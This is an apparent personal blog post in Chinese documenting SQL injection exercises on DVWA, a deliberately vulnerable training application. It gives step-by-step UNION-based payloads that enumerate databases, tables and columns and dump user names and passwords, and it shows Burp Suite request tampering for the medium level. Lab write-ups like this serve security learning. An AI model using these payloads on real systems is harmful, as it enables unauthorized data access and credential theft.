dvwa. sql注入

Created at 2019-05-19 Updated at 2019-08-15 Category 漏洞渗透 Tag dvwa. sql注入


dvwa. sql注入

1.low级别
1.查询当前数据库
1’ union select 1, database()#
mAdeJg.png


2.查询该数据库有几个字段,查找注入点,输入1’ 报错
mAd1e0.png

后面加个#就能识别,此时注入点已经找到
mAdYYF.png
下面查询数据库有几列,三列不存在
mAdwO1.png
两列是有的,所有确定是两列
mAd6YD.png


3.下面查询所有的数据库名字
1’ union select 1,schema_name() from information_schema.columns#
union select联合查询 schema_name 数据库名字 。 information_schema.columns
mAdITf.png


4.数据库下的表查询,联合查询所有数据库中的表!
1’ union select 1,table_name form information_schema.tables#
mAdz7V.png


5.查询表中的字段
1’ union select 1,column_name from information_schema.columns#
mAwVn1.png


6.查询dvwa数据库中的表 table_schema(数据库名
1’ union select 1, table_name from information_schema.tables where table_schema=’dvwa’#
mAw3jA.png


7.查询数据库dvwa下user表下的字段table-name表名
1’ union select 1, column_name from information_schema.columns where table_name=’users’#
mAwBcj.png


8.查询dvwa库下的账户和密码
1’ union select user, password from users; #
mAwh34.png
&emsp
&emsp
(2) . 1’ union select group_concat(user_id,user),group_concat(password) from users;#
mAwL4O.png
2.medium级别
mA03PU.png
可以看出没有回显,可以用burp抓包拦截,把数值调为一,burp开始拦截,发送到repeater里面


mA0DPO.png
改最下面一列的内容,右侧数据库已经显示出来了
mA0bss.png


2.查看数据库的字段,改最后一列
mA0zJU.png

Table of Content

  1. dvwa. sql注入
Site by csy using Hexo & Random

Hide